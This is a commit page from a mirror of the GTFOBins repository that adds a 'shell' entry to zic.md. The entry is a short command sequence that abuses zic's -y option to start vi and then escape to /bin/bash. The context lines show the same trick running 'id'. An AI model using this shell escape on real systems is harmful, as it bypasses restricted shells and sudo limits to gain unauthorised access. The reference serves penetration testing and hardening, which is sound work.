mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add Shell to zic.md
This commit is contained in:
parent
9d438a06d9
commit
5d721ea9af
@ -13,4 +13,10 @@ functions:
|
||||
echo "Rule Jordan 0 1 arg2 Jan lastSun 2 1:00d -" > zicfile
|
||||
echo "Zone Test 2:00 Jordan CE%sT" >> zicfile
|
||||
zic -d . -y "id" ./zicfile
|
||||
shell:
|
||||
- code: |
|
||||
echo "Rule Jordan 0 1 arg2 Jan lastSun 2 1:00d -" > zicfile
|
||||
echo "Zone Test 2:00 Jordan CE%sT" >> zicfile
|
||||
zic -d . -y "vi" ./zicfile
|
||||
:!/bin/bash
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user